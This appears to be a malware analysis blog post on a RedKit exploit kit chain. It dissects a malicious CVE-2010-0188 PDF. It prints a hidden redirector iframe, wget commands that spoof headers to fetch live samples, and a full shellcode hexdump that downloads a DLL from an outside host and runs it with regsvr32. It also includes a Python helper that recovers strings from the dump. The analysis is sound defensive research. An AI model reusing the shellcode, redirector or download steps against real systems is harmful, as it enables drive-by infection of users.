Analysis of CVE-2010-0188 PDF from RedKit ExploitKit

After noticing a substantial increase in RedKit infections during a series of investigations performed on URLQuery, we decided to go deeper and understand what was happening behind the curtains. RedKit is an exploitation pack that uses the following infection flow:

[figure: RedKit-Flow]

Today’s example is this URLQuery report: http://urlquery.net/report.php?id=1305873, and the resource is http://senreibehn.narod.ru/

A user visiting a page compromised with the RedKit redirector will find, as usual, a frame like this:

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2
width=2 src=http://mymesotheliomatreatments.com/eric.html?j=1937657>
</iframe>

The resulting landing page looks like this:

[screenshot: RedKit landing page]

We are interested in the version and date of this plugin:

version: “0.7.7”, rDate: “04/11/2012”, name: “PluginDetect”

and:

<applet archive="hxxp://fishandbird.ca/332.jar" code="Vlast.class">
<applet archive="hxxp://fishandbird.ca/887.jar" code="Vlast.class">
otrtorol.setAttribute (biiz, "hxxp://fishandbird.ca/987.pdf");

In this post we will concentrate on the analysis of the malicious PDF:

https://www.virustotal.com/en/file/2f7d25ce46c31401ce973358b2cc3b8bd7746e9af394d49f883faf60919318f2/analysis/1362737258/

Detection ratio: 4 / 46

We have the link to the document, but we need the proper HTTP headers (Referer and User-Agent) in order to download it; otherwise our download attempt is detected and a 404 error is returned. Let’s fire up wget with the following parameters:

$ wget --referer="hxxp://senreibehn.narod.ru/" --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" -dnv  hxxp://fishandbird.ca/987.pdf
Setting --no (verbose) to 0
DEBUG output created by Wget 1.14 on linux-gnu.

URI encoding = "UTF-8"
Caching fishandbird.ca => 66.96.160.145
Created socket 3.
Releasing 0x00000000017bfa30 (new refcount 1).

---request begin---
GET /987.pdf HTTP/1.1
Referer: hxxp://senreibehn.narod.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: */*
Host: fishandbird.ca
Connection: Keep-Alive

---request end---

---response begin---
HTTP/1.1 200 OK
Date: Thu, 07 Mar 2013 17:45:20 GMT
Content-Type: application/pdf
Content-Length: 6270
Connection: keep-alive
Server: Nginx / Varnish
X-Powered-By: PHP/5.2.17
Content-Disposition: inline; filename=37a1e796.pdf

---response end---
Registered socket 3 for persistent reuse.
2013-03-07 18:43:20 URL:hxxp://fishandbird.ca/987.pdf [6270/6270] -> "987.pdf" [1]

OK, we have our PDF now and we are ready to begin the analysis. We need a tool for inspection; in our case we’ll use Didier Stevens’ pdf-parser.py.

First of all: let’s begin with a statistical analysis:

$ python2 pdf-parser.py --stats  ../../tmp/effective/987.pdf 
Comment: 3
XREF: 1
Trailer: 1
StartXref: 1
Indirect object: 19
  7: 4, 41, 56, 11, 19, 17, 8
 /Annot 1: 16
 /Catalog 1: 7
 /EmbeddedFile 7: 9, 18, 15, 13, 5, 6, 2
 /Font 1: 10
 /Page 1: 1
 /Pages 1: 12

We have a few interesting things here: the PDF structure looks malformed, and it carries /EmbeddedFile objects (notice that no JavaScript object shows up in the stats).

Second: a deeper analysis, to know which objects can be found inside the document:

$ python2 pdf-parser.py --filter --raw  ../../tmp/effective/987.pdf                   
PDF Comment %PDF-1.6

PDF Comment %����

obj 4 0
 Type: 
 Referencing: 
 Contains stream

  <<
    /Filter /FlateDecode
    /Length 166
  >>

TL;DR: the full listing (truncated here) gives a few good clues, but what’s interesting to us is obj 2.

Third: investigate object 2:

$ python2 pdf-parser.py --filter --raw  ../../tmp/effective/987.pdf --object 2

[screenshot: pdf-parser.py output for object 2]

Oh oh, what do we have here?
It’s JavaScript; let’s make it easier on the eyes:

[screenshot: reformatted JavaScript from object 2]

Fourth: analysis of the JavaScript.
Now we have to resolve the variables; for this purpose we will use Node.js:

[screenshot: resolving the variables with Node.js]

Let’s unescape it:

[screenshot: unescaped JavaScript]

And now let’s make it more readable:

[screenshot: deobfuscated JavaScript]

Fast analysis with VirusTotal:

https://www.virustotal.com/en/file/17ada6ea6f704fa814d66658e0d656ac6ca78956924249530b5e3e03bc1ce07c/analysis/1362737102/
Microsoft     Exploit:Win32/CVE-2010-0188

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188

Right now we are not interested in the exploit itself; we want to understand what the dropped payload is.

var sc_str = hex2str (sc_hex);
var scode = str2uni (sc_str);
heap_spray3 (scode);

We can use Python to decode sc_hex (both sc_hex strings do the same thing):

[screenshot: decoding sc_hex with Python]

Let’s save it and scan with VT:
https://www.virustotal.com/en/file/ac41dbad169ffcb798262054cebe7f77920b373488da96c89a8fe68cc7b93f90/analysis/1362737700/

Microsoft Exploit:Win32/Shellcode.AA

Just FYI, this is the scan of the second sc_hex:
https://www.virustotal.com/en/file/d31955efac35e61969ae534576ed4e3c84c0b9a68abc200db290db448d2cb3bc/analysis/1362737908/

Microsoft Exploit:Win32/Shellcode.AA

Here is the hexdump:

00000000  4c 20 60 0f 05 17 80 4a  3c 20 60 0f 0f 63 80 4a  |L `....J< `..c.J|
00000010  a3 eb 80 4a 30 20 82 4a  6e 2f 80 4a 41 41 41 41  |...J0 .Jn/.JAAAA|
00000020  26 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |&...............|
00000030  12 39 80 4a 64 20 60 0f  00 04 00 00 41 41 41 41  |.9.Jd `.....AAAA|
00000040  41 41 41 41 66 83 e4 fc  fc 85 e4 75 34 e9 5f 33  |AAAAf......u4._3|
00000050  c0 64 8b 40 30 8b 40 0c  8b 70 1c 56 8b 76 08 33  |.d.@0.@..p.V.v.3|
00000060  db 66 8b 5e 3c 03 74 33  2c 81 ee 15 10 ff ff b8  |.f.^<.t3,.......|
00000070  8b 40 30 c3 46 39 06 75  fb 87 34 24 85 e4 75 51  |.@0.F9.u..4$..uQ|
00000080  e9 eb 4c 51 56 8b 75 3c  8b 74 35 78 03 f5 56 8b  |..LQV.u<.t5x..V.|
00000090  76 20 03 f5 33 c9 49 41  fc ad 03 c5 33 db 0f be  |v ..3.IA....3...|
000000a0  10 38 f2 74 08 c1 cb 0d  03 da 40 eb f1 3b 1f 75  |.8.t......@..;.u|
000000b0  e6 5e 8b 5e 24 03 dd 66  8b 0c 4b 8d 46 ec ff 54  |.^.^$..f..K.F..T|
000000c0  24 0c 8b d8 03 dd 8b 04  8b 03 c5 ab 5e 59 c3 eb  |$...........^Y..|
000000d0  53 ad 8b 68 20 80 7d 0c  33 74 03 96 eb f3 8b 68  |S..h .}.3t.....h|
000000e0  08 8b f7 6a 05 59 e8 98  ff ff ff e2 f9 e8 00 00  |...j.Y..........|
000000f0  00 00 58 50 6a 40 68 ff  00 00 00 50 83 c0 19 50  |..[email protected]...P...P|
00000100  55 8b ec 8b 5e 10 83 c3  05 ff e3 68 6f 6e 00 00  |U...^......hon..|
00000110  68 75 72 6c 6d 54 ff 16  83 c4 08 8b e8 e8 61 ff  |hurlmT........a.|
00000120  ff ff eb 02 eb 72 81 ec  04 01 00 00 8d 5c 24 0c  |.....r.......\$.|
00000130  c7 04 24 72 65 67 73 c7  44 24 04 76 72 33 32 c7  |..$regs.D$.vr32.|
00000140  44 24 08 20 2d 73 20 53  68 f8 00 00 00 ff 56 0c  |D$. -s Sh.....V.|
00000150  8b e8 33 c9 51 c7 44 1d  00 77 70 62 74 c7 44 1d  |..3.Q.D..wpbt.D.|
00000160  05 2e 64 6c 6c c6 44 1d  09 00 59 8a c1 04 30 88  |..dll.D...Y...0.|
00000170  44 1d 04 41 51 6a 00 6a  00 53 57 6a 00 ff 56 14  |D..AQj.j.SWj..V.|
00000180  85 c0 75 16 6a 00 53 ff  56 04 6a 00 83 eb 0c 53  |..u.j.S.V.j....S|
00000190  ff 56 04 83 c3 0c eb 02  eb 13 47 80 3f 00 75 fa  |.V........G.?.u.|
000001a0  47 80 3f 00 75 c4 6a 00  6a fe ff 56 08 e8 9c fe  |G.?.u.j.j..V....|
000001b0  ff ff 8e 4e 0e ec 98 fe  8a 0e 89 6f 01 bd 33 ca  |...N.......o..3.|
000001c0  8a 5b 1b c6 46 79 36 1a  2f 70 68 74 74 70 3a 2f  |.[..Fy6./phttp:/|
000001d0  2f 66 69 73 68 61 6e 64  62 69 72 64 2e 63 61 2f  |/fishandbird.ca/|
000001e0  36 32 2e 68 74 6d 6c 00  00                       |62.html..|
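Before handing the shellcode to a sandbox, a static pass over the dump already recovers the second-stage URL and shows why the command line and DLL name seen in the API trace do not appear as contiguous strings: the shellcode writes them to the stack four bytes at a time. The following Python script is an added example (not part of the original post); it parses the hexdump -C listing, runs a strings-style scan, and reassembles the 4-byte immediate stores by base register and displacement. The embedded dump is an excerpt of the listing above.

```python
import re

# Constructed excerpt of the hexdump printed above (offsets 0x130-0x16f and
# 0x1c0-0x1e8); the full listing parses the same way.
HEXDUMP = """\
00000130  c7 04 24 72 65 67 73 c7  44 24 04 76 72 33 32 c7  |..$regs.D$.vr32.|
00000140  44 24 08 20 2d 73 20 53  68 f8 00 00 00 ff 56 0c  |D$. -s Sh.....V.|
00000150  8b e8 33 c9 51 c7 44 1d  00 77 70 62 74 c7 44 1d  |..3.Q.D..wpbt.D.|
00000160  05 2e 64 6c 6c c6 44 1d  09 00 59 8a c1 04 30 88  |..dll.D...Y...0.|
000001c0  8a 5b 1b c6 46 79 36 1a  2f 70 68 74 74 70 3a 2f  |.[..Fy6./phttp:/|
000001d0  2f 66 69 73 68 61 6e 64  62 69 72 64 2e 63 61 2f  |/fishandbird.ca/|
000001e0  36 32 2e 68 74 6d 6c 00  00                       |62.html..|
"""
LINE = re.compile(r"^([0-9a-f]{8})\s+((?:[0-9a-f]{2}\s+){1,16})\|", re.M)
# mov dword [esp], imm32 (c7 04 24) and mov dword [base+index+disp8], imm32 (c7 44 sib disp8)
STORE = re.compile(rb"\xc7(?:\x04\x24|\x44(?P<sib>.)(?P<disp>.))(?P<imm>.{4})", re.S)

def parse_hexdump(text):
    """Rebuild the byte buffer from `hexdump -C` lines; gaps are zero-filled."""
    buf = bytearray()
    for off, hexs in LINE.findall(text):
        off, data = int(off, 16), bytes.fromhex(hexs.replace(" ", ""))
        buf.extend(b"\0" * (off - len(buf)))
        buf[off:off + len(data)] = data
    return bytes(buf)

def printable_strings(buf, min_len=4):
    """Plain `strings`-style scan: (offset, text) for each printable run."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pat.finditer(buf)]

def urls(buf):
    """URLs embedded in the shellcode (the second-stage download location)."""
    return [m.group().decode() for m in re.finditer(rb"https?://[\x21-\x7e]+", buf)]

def stack_strings(buf):
    """Group printable 4-byte immediate stores by base register (SIB byte) and
    lay them out by displacement; bytes not written statically show as '?'."""
    groups = {}
    for m in STORE.finditer(buf):
        sib = (m.group("sib") or b"\x24")[0]   # the plain [esp] form implies SIB 0x24
        disp = m.group("disp")[0] if m.group("disp") else 0
        if all(0x20 <= b < 0x7f for b in m.group("imm")):
            groups.setdefault(sib, {})[disp] = m.group("imm")
    out = []
    for sib, parts in groups.items():
        layout = bytearray(b"?" * (max(parts) + 4))
        for disp, imm in parts.items():
            layout[disp:disp + 4] = imm
        out.append((sib, layout.decode("ascii")))
    return out
```

stack_strings() yields "regsvr32 -s " for the esp-based stores and "wpbt?.dll" for the ebp+ebx-based ones; the byte at position 4 is only written at runtime (the trace shows it as "0"), which is why a plain strings run reports just "regs", "vr32", "wpbt" and ".dll".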

Running the shellcode through Wepawet gives us this API trace:

Shellcode Analysis
Shellcode API Trace
Offset	DLL.API Name and arguments	Return value
0x7c801ad9	kernel32.VirtualProtect(lpAddress=0x4020f8, dwSize=255)	1
0x7c801d7b	kernel32.LoadLibraryA(lpFileName=urlmon)	0x1a400000
0x7c835dfa	kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])	
0x1a494bbe	urlmon.URLDownloadToFileA(pCaller=0, szURL=hxxp://fishandbird.ca/62.html, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)	0
0x7c86250d	kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)	
0x7c86250d	kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)	
0x7c81cb3b	kernel32.TerminateThread(dwExitCode=0)

Which, in order, does the following:

  1. LoadLibrary of urlmon.dll
  2. Downloads the payload from hxxp://fishandbird.ca/62.html
  3. Writes the data to wpbt0.dll in the temp directory
  4. Executes the binary via WinExec()
  5. Registers the DLL by running: regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll

Let’s fire up wget again and download the final stage from hxxp://fishandbird.ca/62.html:

$ wget --referer="hxxp://senreibehn.narod.ru/" --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" -dnv  hxxp://fishandbird.ca/62.html
Setting --no (verbose) to 0
DEBUG output created by Wget 1.14 on linux-gnu.

URI encoding = "UTF-8"
Caching fishandbird.ca => 66.96.160.145
Created socket 3.
Releasing 0x0000000000dafa40 (new refcount 1).

---request begin---
GET /62.html HTTP/1.1
Referer: hxxp://senreibehn.narod.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: */*
Host: fishandbird.ca
Connection: Keep-Alive

---request end---

---response begin---
HTTP/1.1 200 OK
Date: Thu, 07 Mar 2013 17:45:49 GMT
Content-Type: application/octet-stream
Content-Length: 26977
Connection: keep-alive
Server: Nginx / Varnish
X-Powered-By: PHP/5.2.17
Expires: Mon, 20 Aug 2002 02:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename=setup.exe

---response end---
Registered socket 3 for persistent reuse.
2013-03-07 18:43:50 URL:hxxp://fishandbird.ca/62.html [26977/26977] -> "62.html" [1]

Of course, we are dealing with another binary:

https://www.virustotal.com/en/file/d34414b40ba1573722c96a02d37fdf553e2b2427b7757228e24885cde96cda80/analysis/1362738404/
Detection ratio: 20 / 46
Microsoft TrojanDownloader:Win32/Karagany.I

Size: 26977
MD5: 4e0d8266609ef72a285a2fcb5871d2de
SHA1: 1d114f920252fec07ace3b929171ec1614f888e5
SHA256: d34414b40ba1573722c96a02d37fdf553e2b2427b7757228e24885cde96cda80
ssdeep: 768:jdjPEgPcTA9Qcw0fwvPi867rg8LDuRvGCOZsF:1PzPcTrcnfGPg7r5LDIvGC7F
First Seen: 2013-03-07 18:11:06.828570
Last Seen: 2013-03-07 18:11:06.828594
Tags: []
References: []
File Type: Win32 EXE

ExifTool: 
['File Access Date/Time           : 2013:03:07 18:56:15+01:00',
 'File Inode Change Date/Time     : 2013:03:07 18:55:14+01:00',
 'File Permissions                : rw-r--r--',
 'MIME Type                       : application/octet-stream',
 'Machine Type                    : Intel 386 or later, and compatibles',
 'Time Stamp                      : 2013:03:07 13:47:57+01:00',
 'PE Type                         : PE32',
 'Linker Version                  : 1.1',
 'Code Size                       : 13824',
 'Initialized Data Size           : 2560',
 'Uninitialized Data Size         : 0',
 'Entry Point                     : 0x1000',
 'OS Version                      : 4.0',
 'Image Version                   : 0.0',
 'Subsystem Version               : 4.0',
 'Subsystem                       : Windows GUI']

TrID: 
[' 38.4% (.DLL) Win32 Dynamic Link Library (generic) (6581/28/2)',
 ' 38.0% (.EXE) Win32 Executable (generic) (6514/8/2)',
 ' 11.7% (.EXE) Generic Win/DOS Executable (2002/3)',
 ' 11.6% (.EXE) DOS Executable Generic (2000/1)',
 '  0.0% (.CEL) Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3)']

PeID: 
[['PureBasic 4.x -> Neil Hodgson']]

Antivirus Signatures: 
[]

PE INFO: 
Time Stamp:     2013-03-07 12:47:57
Portable Executable Signature: PE32 on i386 architecture

Section:

Name:                   .code
Virtual Address:        0x1000
Virtual Size:           6924
Size of Raw Offset:     7168
SHA1:                   6a51b7ee8fb5961cf323c7123fe45d272cdbe8e5
Entropy:                5.61391718668 

Name:                   .text
Virtual Address:        0x3000
Virtual Size:           6557
Size of Raw Offset:     6656
SHA1:                   c7504a2970b2a2998b27660093c004b681644e66
Entropy:                6.23719207884 

Name:                   .rdata
Virtual Address:        0x5000
Virtual Size:           16
Size of Raw Offset:     512
SHA1:                   7d2f468b2932c6797fe38c06a969e27a2c3f9b47
Entropy:                0.231158144857 

Name:                   .data
Virtual Address:        0x6000
Virtual Size:           1904
Size of Raw Offset:     1536
SHA1:                   e2e16b7dc9dd6a5aff25b792f751828a50c10739
Entropy:                4.40287462284 

Imports:

MSVCRT.dll
        memset                          0x406280
        strcmp                          0x406284
        memmove                         0x406288
        memcpy                          0x40628c
        strlen                          0x406290

KERNEL32.dll
        GetModuleHandleA                0x406298
        HeapCreate                      0x40629c
        HeapDestroy                     0x4062a0
        ExitProcess                     0x4062a4
        CloseHandle                     0x4062a8
        SetCommTimeouts                 0x4062ac
        InitializeCriticalSection       0x4062b0
        GetModuleFileNameA              0x4062b4
        GetExitCodeProcess              0x4062b8
        WideCharToMultiByte             0x4062bc
        HeapAlloc                       0x4062c0
        SetCurrentDirectoryA            0x4062c4
        WriteFile                       0x4062c8
        HeapFree                        0x4062cc
        ReadFile                        0x4062d0
        HeapReAlloc                     0x4062d4

USER32.DLL
        CallWindowProcA                 0x4062dc


Stay tuned: in the next blog post we’ll further investigate the dropped malware. For your own study, here is a package with all the files; as usual the password is set to: infected

[archive: redkit-pdf]

$ md5sum 987.pdf 62.html payload.bin payload2.bin javascript1.js
8c964618db35a6e34ee57418c001e1cc  987.pdf
4e0d8266609ef72a285a2fcb5871d2de  62.html
8ff277a29a83bfb77edefbd2b3fd2681  payload.bin
8fe6634b059c7747fd4eeaed1e840121  payload2.bin
c4d9037b666144569a5ccabe06d46763  javascript1.js